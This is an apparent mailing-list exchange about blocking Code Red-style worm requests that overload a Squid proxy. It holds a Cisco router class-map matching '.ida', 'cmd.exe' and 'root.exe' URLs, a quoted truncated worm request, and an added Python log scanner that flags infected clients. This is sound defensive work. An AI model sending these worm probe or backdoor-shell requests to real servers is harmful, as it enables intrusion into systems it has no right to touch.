I think for this you will have to deny it from your border router like that:

Router(config)#class-map match-any http-hacks
Router(config-cmap)#match protocol http url "*.ida*"
Router(config-cmap)#match protocol http url "*cmd.exe*"
Router(config-cmap)#match protocol http url "*root.exe*"

here yours:

Router(config-cmap)#match protocol http url "XXXXXXXXXXXXX"

I think it will work...

Best Regards,
Masood Ahmad Shah
System Administrator
Fibre Net
Lahore, Pakistan
Mobile# +92423004277367

--- Wei Keong <[EMAIL PROTECTED]> wrote:
> Hi,
>
> We are seeing a possible new code red. Each victim will flood to a
> particular destination. Unlike the original one, this one does not
> send a proper HTTP method. Although Squid will return Bad Request, this
> attack will consume a lot of resources and bring down the Squid box...
>
> Anybody catches the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411. If this is
> true, is there any way to deny these requests?
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
> Thanks,
> Wei Keong
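
One way to find which clients behind the proxy are producing these requests, as an added example that is not part of the original thread: it scans Squid access.log lines for the NONE/400 and NONE/411 results mentioned in the question and for the URL patterns from the class-map in the reply. The log lines, addresses, function name and threshold are constructed for illustration, and the field positions assume Squid's native access.log layout.

```python
import re
from collections import Counter, defaultdict

# URL substrings mirrored from the class-map in the reply (*.ida*, *cmd.exe*, *root.exe*).
WORM_URL = re.compile(r"\.ida|cmd\.exe|root\.exe", re.IGNORECASE)
# Result codes the original poster reports for the malformed requests.
ERROR_RESULTS = {"NONE/400", "NONE/411"}

# Constructed sample, assumed native layout:
# time elapsed client result/status bytes method URL ident hierarchy type
SAMPLE_LOG = """\
1049871601.120 2 192.0.2.15 NONE/411 1102 GET http://198.51.100.7/default.ida? - NONE/- -
1049871601.310 1 192.0.2.15 NONE/400 1098 NONE - - NONE/- -
1049871601.522 2 192.0.2.15 NONE/411 1102 GET http://198.51.100.7/default.ida? - NONE/- -
1049871602.004 85 192.0.2.20 TCP_MISS/200 5120 GET http://www.example.com/ - DIRECT/203.0.113.5 text/html
1049871602.410 1 192.0.2.20 NONE/400 1098 NONE - - NONE/- -
1049871603.007 3 192.0.2.31 TCP_DENIED/403 1044 GET http://198.51.100.9/scripts/root.exe? - NONE/- -
truncated line
"""


def suspect_clients(log_text, threshold=2):
    """Return {client: {result_code: count}} for clients with at least
    `threshold` requests that are malformed or match a worm URL pattern."""
    per_client = defaultdict(Counter)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # skip truncated or unparsable log lines
        client, result, url = fields[2], fields[3], fields[6]
        if result in ERROR_RESULTS or WORM_URL.search(url):
            per_client[client][result] += 1
    return {
        client: dict(codes)
        for client, codes in per_client.items()
        if sum(codes.values()) >= threshold
    }


if __name__ == "__main__":
    # Print flagged clients, busiest first, as candidates for cleanup or
    # for filtering upstream of the proxy.
    flagged = suspect_clients(SAMPLE_LOG)
    for client, codes in sorted(flagged.items(), key=lambda kv: -sum(kv[1].values())):
        print(client, sum(codes.values()), codes)
```

A single malformed request is not unusual on a busy proxy, so the threshold should be tuned to the normal NONE/400 rate in your own logs.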
